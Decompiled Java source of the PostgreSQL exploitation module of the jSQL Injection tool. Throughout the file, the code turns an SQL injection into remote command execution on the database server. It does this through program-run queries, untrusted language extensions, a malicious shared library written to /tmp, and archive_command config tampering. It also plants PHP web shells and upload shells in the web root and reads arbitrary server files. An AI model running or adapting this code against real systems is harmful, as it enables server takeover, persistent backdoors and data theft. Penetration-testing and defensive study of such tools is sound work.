/*
 * Decompiled with CFR 0.152.
 */
package com.jsql.model.accessible.engine;

import com.jsql.model.InjectionModel;
import com.jsql.model.accessible.ResourceAccess;
import com.jsql.model.accessible.engine.ExploitMysql;
import com.jsql.model.accessible.engine.postgres.ModelYamlPostgres;
import com.jsql.model.bean.database.MockElement;
import com.jsql.model.exception.AbstractSlidingException;
import com.jsql.model.exception.InjectionFailureException;
import com.jsql.model.exception.JSqlException;
import com.jsql.model.exception.JSqlRuntimeException;
import com.jsql.model.suspendable.Input;
import com.jsql.model.suspendable.SuspendableGetRows;
import com.jsql.util.LogLevelUtil;
import com.jsql.util.StringUtil;
import com.jsql.view.subscriber.Seal;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.net.http.HttpResponse;
import java.util.Arrays;
import java.util.List;
import java.util.Objects;
import java.util.UUID;
import java.util.function.BinaryOperator;
import org.apache.commons.lang3.RandomStringUtils;
import org.apache.commons.lang3.StringUtils;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.yaml.snakeyaml.Yaml;

public class ExploitPostgres {
    private static final Logger LOGGER = LogManager.getRootLogger();
    private final InjectionModel injectionModel;
    private String nameExtension = "";
    private final ModelYamlPostgres modelYaml;

    public ExploitPostgres(InjectionModel injectionModel) {
        this.injectionModel = injectionModel;
        Yaml yaml = new Yaml();
        this.modelYaml = yaml.loadAs(injectionModel.getMediatorEngine().getPostgres().instance().getModelYaml().getResource().getExploit(), ModelYamlPostgres.class);
    }

    public void createUdf(String nameExtension) throws JSqlException {
        LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "Exploit mode forced to query body");
        if (StringUtils.isNotEmpty(nameExtension)) {
            this.setRceExtensionWhenActive(false, nameExtension);
        } else {
            boolean isUdfActive = this.setRceProgramWhenActive();
            isUdfActive = this.setRceExtensionWhenActive(isUdfActive, nameExtension);
            isUdfActive = this.setRceLibraryWhenActive(isUdfActive);
            this.setRceArchiveWhenActive(isUdfActive);
        }
    }

    private String getCreateBasicExtension() {
        String plCreateExtension = null;
        if (this.nameExtension.startsWith("plpython")) {
            plCreateExtension = String.format(this.modelYaml.getUdf().getPlpython(), this.nameExtension);
        } else if (this.nameExtension.startsWith("plperl")) {
            plCreateExtension = this.modelYaml.getUdf().getPlperl();
        } else if (this.nameExtension.startsWith("pltcl")) {
            plCreateExtension = this.modelYaml.getUdf().getPltcl();
        } else if (this.nameExtension.startsWith("plr")) {
            plCreateExtension = this.modelYaml.getUdf().getPlr();
        } else if (this.nameExtension.startsWith("pllua")) {
            plCreateExtension = this.modelYaml.getUdf().getPllua();
        } else if (this.nameExtension.startsWith("plsh")) {
            plCreateExtension = this.modelYaml.getUdf().getPlsh();
        }
        return plCreateExtension;
    }

    private boolean setRceProgramWhenActive() {
        LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "RCE [Program] requirements: stack query");
        String nameTempTable = RandomStringUtils.secure().nextAlphabetic(8);
        this.injectionModel.injectWithoutIndex(String.format(this.modelYaml.getFile().getWrite().getTempTable().getAdd(), nameTempTable), "tbl#create");
        this.injectionModel.injectWithoutIndex(String.format(this.modelYaml.getUdf().getProgram().getRun(), nameTempTable, ResourceAccess.WEB_CONFIRM_CMD), "tbl#fill");
        String result = this.injectionModel.getResourceAccess().getResultWithCatch(String.format(this.modelYaml.getUdf().getProgram().getGetResult(), nameTempTable), "tbl#read");
        if (result.contains("133717331")) {
            LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, "RCE [Program] successful: command execution found");
            this.injectionModel.sendToViews(new Seal.AddTabExploitUdf((command, terminalID) -> this.injectionModel.getResourceAccess().getExploitPostgres().runRceProgramCmd((String)command, (UUID)terminalID)));
            return true;
        }
        return false;
    }

    private boolean setRceExtensionWhenActive(boolean isUdfActive, String nameExtension) throws JSqlException {
        if (isUdfActive) {
            return true;
        }
        if (StringUtils.isNotEmpty(nameExtension)) {
            this.nameExtension = this.getExtensionWhenCreated(nameExtension);
            LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "IT RCE [Extension]: searching [{}], found [{}]", (Object)nameExtension, (Object)this.nameExtension);
        } else {
            this.nameExtension = "";
            LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "RCE [Extension] requirements: stack query, any of py/sh/pl/lua/sql/r/tcl installed");
            for (String ext : Arrays.asList("plpython3u", "plpython2u", "plpythonu", "plperlu", "pltclu", "pllua", "plsh", "sql", "plr")) {
                if (!StringUtils.isEmpty(this.nameExtension)) continue;
                this.nameExtension = this.getExtensionWhenCreated(ext);
            }
            if (StringUtils.isEmpty(this.nameExtension)) {
                LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "RCE [Extension] failure: no extension found");
                return false;
            }
        }
        this.injectionModel.injectWithoutIndex(this.modelYaml.getUdf().getDropFunc(), "func#drop");
        String plCreateBasicExtension = this.getCreateBasicExtension();
        if (plCreateBasicExtension != null) {
            this.injectionModel.injectWithoutIndex(plCreateBasicExtension, "body#add-func");
        } else if (this.nameExtension.startsWith("sql")) {
            this.injectionModel.injectWithoutIndex(this.modelYaml.getUdf().getSql().getDropTable(), "tbl#drop");
            this.injectionModel.injectWithoutIndex(this.modelYaml.getUdf().getSql().getCreateTable(), "tbl#create");
            this.injectionModel.injectWithoutIndex(this.modelYaml.getUdf().getSql().getConfirm().getAddFunc(), "body#add-func");
            this.injectionModel.injectWithoutIndex(this.modelYaml.getUdf().getSql().getRunCmd(), "body#run-func");
            String result = this.injectionModel.getResourceAccess().getResult(String.format(this.modelYaml.getUdf().getSql().getResultCmd(), ""), "body#confirm");
            if (!"1337".equals(result)) {
                return false;
            }
        }
        String functions = this.injectionModel.getResourceAccess().getResult(this.modelYaml.getUdf().getSql().getConfirm().getFuncExists(), "body#confirm");
        if (!functions.contains("exec_cmd")) {
            LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "RCE failure: function not found");
            return false;
        }
        LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, "RCE [Extension] successful: function found for extension [{}]", (Object)this.nameExtension);
        this.injectionModel.sendToViews(new Seal.AddTabExploitUdf((command, terminalID) -> this.injectionModel.getResourceAccess().getExploitPostgres().runRceExtensionCmd((String)command, (UUID)terminalID)));
        return true;
    }

    public boolean setRceLibraryWhenActive(boolean isUdfActive) throws JSqlException {
        if (isUdfActive) {
            return true;
        }
        LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "RCE [Library] requirements: stack query");
        this.injectionModel.injectWithoutIndex(String.format(this.modelYaml.getUdf().getLibrary().getDropFunc(), new Object[0]), "func#drop");
        String loid = this.injectionModel.getResourceAccess().getResultWithCatch(String.format(this.modelYaml.getUdf().getLibrary().getLoFromText(), String.join((CharSequence)"", ExploitPostgres.toHexChunks("v10.64"))), "loid#create");
        if (StringUtils.isEmpty(loid)) {
            LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit loid not found");
            return false;
        }
        String nameExploit = RandomStringUtils.secure().nextAlphabetic(8) + ".so";
        this.injectionModel.getResourceAccess().getResultWithCatch(String.format(this.modelYaml.getUdf().getLibrary().getLoToFile(), loid, "/tmp/" + nameExploit), "loid#write");
        this.injectionModel.injectWithoutIndex(String.format(this.modelYaml.getUdf().getLibrary().getCreateFunction(), "/tmp/" + nameExploit), "body#add-func");
        String result = this.injectionModel.getResourceAccess().getResultWithCatch(String.format(this.modelYaml.getUdf().getLibrary().getRunFunc(), ResourceAccess.WEB_CONFIRM_CMD + "%20"), "confirm");
        if (!result.contains("133717331")) {
            LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit body not found");
            return false;
        }
        LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, "RCE [Library] successful");
        this.injectionModel.sendToViews(new Seal.AddTabExploitUdf((command, terminalID) -> this.injectionModel.getResourceAccess().getExploitPostgres().runRceLibraryCmd((String)command, (UUID)terminalID)));
        return true;
    }

    private void setRceArchiveWhenActive(boolean isUdfActive) throws JSqlException {
        if (isUdfActive) {
            return;
        }
        LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "RCE [Archive] requirements: archive_mode enabled");
        if (!"".equals(this.runArchive(null))) {
            LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, "RCE [Archive] successful: command execution found");
            this.injectionModel.sendToViews(new Seal.AddTabExploitUdf((command, terminalID) -> this.injectionModel.getResourceAccess().getExploitPostgres().runRceArchiveCmd((String)command, (UUID)terminalID)));
        }
    }

    private static List<String> toHexChunks(String filename) throws JSqlException {
        try {
            byte[] fileData = Objects.requireNonNull(ExploitMysql.class.getClassLoader().getResourceAsStream("exploit/postgres/" + filename + ".so")).readAllBytes();
            return StringUtil.toHexChunks(fileData);
        }
        catch (IOException e) {
            throw new JSqlException(e);
        }
    }

    public String runRceLibraryCmd(String command, UUID uuidShell) {
        String result;
        try {
            result = this.injectionModel.getResourceAccess().getResult(String.format(this.modelYaml.getUdf().getLibrary().getRunFunc(), command.replace(" ", "%20") + "%20"), "body#run-func");
        }
        catch (JSqlException e) {
            result = String.format("Command failure: %s\nTry '%s 2>&1' to get a system error message.\n", e.getMessage(), command);
        }
        this.injectionModel.sendToViews(new Seal.GetTerminalResult(uuidShell, result.trim() + "\n"));
        return result;
    }

    private String runArchive(String command) throws JSqlException {
        boolean isSetup = command == null;
        String pathResult = "/tmp/cmd.txt";
        String status = this.injectionModel.getResourceAccess().getResult(this.modelYaml.getUdf().getArchive().getGetStatus(), "wal#status");
        if (isSetup && !status.contains("on")) {
            LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit [Archive] failure: archive_mode disabled");
            return "";
        }
        String pathConf = this.injectionModel.getResourceAccess().getResult(this.modelYaml.getUdf().getArchive().getGetPathConf(), "conf#path");
        String loidConf = this.injectionModel.getResourceAccess().getResult(String.format(this.modelYaml.getFile().getRead().getLargeObject().getFromPath(), pathConf), "conf#loid");
        String lengthConf = this.injectionModel.getResourceAccess().getResult(String.format(this.modelYaml.getUdf().getArchive().getGetConfLength(), loidConf), "conf#size");
        this.injectionModel.getResourceAccess().getResultWithCatch(String.format(this.modelYaml.getUdf().getArchive().getPutCmd(), loidConf, lengthConf, isSetup ? ResourceAccess.WEB_CONFIRM_CMD + "%20" : command, pathResult), "conf#append");
        this.injectionModel.getResourceAccess().getResultWithCatch(String.format(this.modelYaml.getFile().getWrite().getLargeObject().getToFile(), loidConf, pathConf), "conf#write");
        this.injectionModel.getResourceAccess().getResultWithCatch(this.modelYaml.getUdf().getArchive().getReloadConf(), "wal#reload");
        String cmdArchive = this.injectionModel.getResourceAccess().getResult(this.modelYaml.getUdf().getArchive().getGetCmd(), "cmd#confirm");
        if (isSetup && !cmdArchive.contains(pathResult)) {
            LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit [Archive] failure: archive command missing");
            return "";
        }
        this.injectionModel.getResourceAccess().getResultWithCatch(this.modelYaml.getUdf().getArchive().getRunWal(), "wal#run");
        try {
            Thread.sleep(750L);
        }
        catch (InterruptedException e) {
            LOGGER.log(LogLevelUtil.IGNORE, e, (Throwable)e);
            Thread.currentThread().interrupt();
        }
        String loidResult = this.injectionModel.getResourceAccess().getResultWithCatch(String.format(this.modelYaml.getFile().getRead().getLargeObject().getFromPath(), pathResult), "result#loid");
        String result = this.injectionModel.getResourceAccess().getResult(String.format(this.modelYaml.getFile().getRead().getLargeObject().getToText(), loidResult), "result#read");
        if (isSetup && !result.contains("133717331")) {
            LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit [Archive] failure: command result missing");
            return "";
        }
        return result;
    }

    private String getExtensionWhenCreated(String nameExtension) throws JSqlException {
        LOGGER.log(LogLevelUtil.CONSOLE_INFORM, "Checking extension [{}]", (Object)nameExtension);
        this.injectionModel.injectWithoutIndex(String.format(this.modelYaml.getUdf().getExtension().getCreate(), nameExtension), "body#add-ext");
        String languages = this.injectionModel.getResourceAccess().getResult(this.modelYaml.getUdf().getExtension().getLanguages(), "body#confirm-ext");
        if (languages.contains(nameExtension)) {
            LOGGER.log(LogLevelUtil.CONSOLE_INFORM, "Language [{}] found: {}", (Object)nameExtension, (Object)languages);
            return nameExtension;
        }
        LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Language [{}] not found: {}", (Object)nameExtension, (Object)languages);
        return "";
    }

    public String runRceArchiveCmd(String command, UUID uuidShell) {
        String result;
        try {
            result = this.runArchive(command.replace(" ", "%20") + "%20");
        }
        catch (JSqlException e) {
            result = String.format("Command failure: %s\nTry '%s 2>&1' to get a system error message.\n", e.getMessage(), command);
        }
        this.injectionModel.sendToViews(new Seal.GetTerminalResult(uuidShell, result.trim() + "\n"));
        return result;
    }

    public String runRceProgramCmd(String command, UUID uuidShell) {
        String result;
        try {
            String nameTempTable = RandomStringUtils.secure().nextAlphabetic(8);
            this.injectionModel.injectWithoutIndex(String.format(this.modelYaml.getFile().getWrite().getTempTable().getAdd(), nameTempTable), "tbl#create");
            this.injectionModel.injectWithoutIndex(String.format(this.modelYaml.getUdf().getProgram().getRun(), nameTempTable, command.replace(" ", "%20") + "%20"), "tbl#fill");
            result = this.injectionModel.getResourceAccess().getResult(String.format(this.modelYaml.getUdf().getProgram().getGetResult(), nameTempTable), "tbl#read");
        }
        catch (JSqlException e) {
            result = String.format("Command failure: %s\nTry '%s 2>&1' to get a system error message.\n", e.getMessage(), command);
        }
        this.injectionModel.sendToViews(new Seal.GetTerminalResult(uuidShell, result.trim() + "\n"));
        return result;
    }

    public String runRceExtensionCmd(String command, UUID uuidShell) {
        Object result;
        try {
            if ("sql".equals(this.nameExtension)) {
                this.injectionModel.injectWithoutIndex(this.modelYaml.getUdf().getSql().getClean(), "body#empty-tbl");
                this.injectionModel.injectWithoutIndex(String.format(this.modelYaml.getUdf().getSql().getRunFunc(), command.replace(" ", "%20")), "body#add-func");
                this.injectionModel.injectWithoutIndex(this.modelYaml.getUdf().getSql().getRunCmd(), "udf#run-cmd");
                result = this.injectionModel.getResourceAccess().getResult(String.format(this.modelYaml.getUdf().getSql().getResultCmd(), "%01%03%03%07"), "body#result") + "\n";
            } else {
                result = this.injectionModel.getResourceAccess().getResult(String.format(this.modelYaml.getUdf().getRunFunc(), command.replace(" ", "%20"), "%01%03%03%07"), "udf#run-cmd");
            }
        }
        catch (JSqlException e) {
            result = String.format("Command failure: %s\nTry '%s 2>&1' to get a system error message.\n", e.getMessage(), command);
        }
        this.injectionModel.sendToViews(new Seal.GetTerminalResult(uuidShell, ((String)result).trim() + "\n"));
        return result;
    }

    public String createWeb(String pathExploit, String urlExploit) {
        String bodyExploit = StringUtil.base64Decode(this.injectionModel.getMediatorUtils().propertiesUtil().getProperty("exploit.web")).replace("${shell.lead}", "SqLi").replace("${shell.trail}", "iLQS");
        String loid = this.injectionModel.getResourceAccess().getResultWithCatch(String.format(this.modelYaml.getFile().getWrite().getLargeObject().getFromText(), bodyExploit.replace("'", "\"")), "loid#create");
        if (StringUtils.isEmpty(loid)) {
            LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit loid not found");
            return "";
        }
        String nameExploit = RandomStringUtils.secure().nextAlphabetic(8) + ".php";
        this.injectionModel.getResourceAccess().getResultWithCatch(String.format(this.modelYaml.getFile().getWrite().getLargeObject().getToFile(), loid, pathExploit + nameExploit), "loid#write");
        BinaryOperator biFuncGetRequest = (pathExploitFixed, urlSuccess) -> {
            String result = this.injectionModel.getResourceAccess().callCommand(urlSuccess + "?c=" + ResourceAccess.WEB_CONFIRM_CMD);
            if (!result.contains("133717331")) {
                LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit body not found");
                return "";
            }
            this.injectionModel.sendToViews(new Seal.AddTabExploitWeb((String)urlSuccess));
            return urlSuccess;
        };
        return this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest);
    }

    public String createSql(String pathExploit, String urlExploit, String username, String password) {
        BinaryOperator biFuncGetRequest = (pathExploitFixed, urlSuccess) -> {
            String resultQuery = this.injectionModel.getResourceAccess().runSqlShell("select 1337", null, (String)urlSuccess, username, password, false);
            if (resultQuery != null && resultQuery.contains("| 1337 |")) {
                this.injectionModel.sendToViews(new Seal.AddTabExploitSql((String)urlSuccess, username, password));
                return urlSuccess;
            }
            return "";
        };
        String bodyExploit = StringUtil.base64Decode(this.injectionModel.getMediatorUtils().propertiesUtil().getProperty("exploit.sql.pdo.pgsql")).replace("${shell.lead}", "SqLi").replace("${shell.trail}", "iLQS");
        String loid = this.injectionModel.getResourceAccess().getResultWithCatch(String.format(this.modelYaml.getFile().getWrite().getLargeObject().getFromText(), bodyExploit.replace("'", "\"")), "loid#create");
        if (StringUtils.isEmpty(loid)) {
            LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit loid not found");
            return "";
        }
        String nameExploit = RandomStringUtils.secure().nextAlphabetic(8) + ".php";
        this.injectionModel.getResourceAccess().getResultWithCatch(String.format(this.modelYaml.getFile().getWrite().getLargeObject().getToFile(), loid, pathExploit + nameExploit), "loid#write");
        return this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest);
    }

    public void createUpload(String pathExploit, String urlExploit, File fileToUpload) {
        String bodyExploit = StringUtil.base64Decode(this.injectionModel.getMediatorUtils().propertiesUtil().getProperty("exploit.upl")).replace("${shell.lead}", "SqLi").replace("${shell.trail}", "iLQS");
        String loid = this.injectionModel.getResourceAccess().getResultWithCatch(String.format(this.modelYaml.getFile().getWrite().getLargeObject().getFromText(), bodyExploit.replace("'", "\"")), "loid#create");
        if (StringUtils.isEmpty(loid)) {
            LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Exploit loid not found");
            return;
        }
        String nameExploit = RandomStringUtils.secure().nextAlphabetic(8) + ".php";
        this.injectionModel.getResourceAccess().getResultWithCatch(String.format(this.modelYaml.getFile().getWrite().getLargeObject().getToFile(), loid, pathExploit + nameExploit), "loid#write");
        BinaryOperator biFuncGetRequest = (pathExploitFixed, urlSuccess) -> {
            try (FileInputStream streamToUpload = new FileInputStream(fileToUpload);){
                HttpResponse<String> result = this.injectionModel.getResourceAccess().upload(fileToUpload, (String)urlSuccess, streamToUpload);
                if (result.body().contains("SqLiy")) {
                    LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, "Upload successful: ack received for {}{}", (Object)pathExploit, (Object)fileToUpload.getName());
                } else {
                    LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "Upload failure: missing ack for {}{}", (Object)pathExploit, (Object)fileToUpload.getName());
                }
            }
            catch (InterruptedException e) {
                LOGGER.log(LogLevelUtil.IGNORE, e, (Throwable)e);
                Thread.currentThread().interrupt();
            }
            catch (JSqlException | IOException e) {
                throw new JSqlRuntimeException(e);
            }
            return urlSuccess;
        };
        this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest);
    }

    public String getRead(String pathFile) throws AbstractSlidingException {
        String resultToParse;
        block3: {
            resultToParse = "";
            try {
                resultToParse = new SuspendableGetRows(this.injectionModel).run(new Input(String.format(this.injectionModel.getResourceAccess().getExploitPostgres().getModelYaml().getFile().getRead().getFromDataFolder(), pathFile), new String[]{""}, false, 1, MockElement.MOCK, "file#read"));
            }
            catch (InjectionFailureException e) {
                LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "Read data folder failure, trying with large object");
                String loid = this.injectionModel.getResourceAccess().getResultWithCatch(String.format(this.injectionModel.getResourceAccess().getExploitPostgres().getModelYaml().getFile().getRead().getLargeObject().getFromPath(), pathFile), "loid#create");
                if (StringUtils.isNotEmpty(loid)) {
                    resultToParse = this.injectionModel.getResourceAccess().getResultWithCatch(String.format(this.injectionModel.getResourceAccess().getExploitPostgres().getModelYaml().getFile().getRead().getLargeObject().getToText(), loid), "loid#read");
                }
                if (!StringUtils.isEmpty(resultToParse)) break block3;
                LOGGER.log(LogLevelUtil.CONSOLE_DEFAULT, "Read large object failure, trying with stack read");
                String nameLibraryRandom = "tmp_" + RandomStringUtils.secure().nextAlphabetic(8);
                this.injectionModel.injectWithoutIndex(String.format(this.injectionModel.getResourceAccess().getExploitPostgres().getModelYaml().getFile().getWrite().getTempTable().getDrop(), nameLibraryRandom), "tbl#drop");
                this.injectionModel.injectWithoutIndex(String.format(this.injectionModel.getResourceAccess().getExploitPostgres().getModelYaml().getFile().getWrite().getTempTable().getAdd(), nameLibraryRandom), "tbl#create");
                this.injectionModel.injectWithoutIndex(String.format(this.injectionModel.getResourceAccess().getExploitPostgres().getModelYaml().getFile().getWrite().getTempTable().getFill(), nameLibraryRandom, pathFile), "tbl#fill");
                resultToParse = new SuspendableGetRows(this.injectionModel).run(new Input(String.format(this.injectionModel.getResourceAccess().getExploitPostgres().getModelYaml().getFile().getRead().getFromTempTable(), nameLibraryRandom), new String[]{""}, false, 1, MockElement.MOCK, "tbl#read"));
            }
        }
        return resultToParse;
    }

    public ModelYamlPostgres getModelYaml() {
        return this.modelYaml;
    }
}

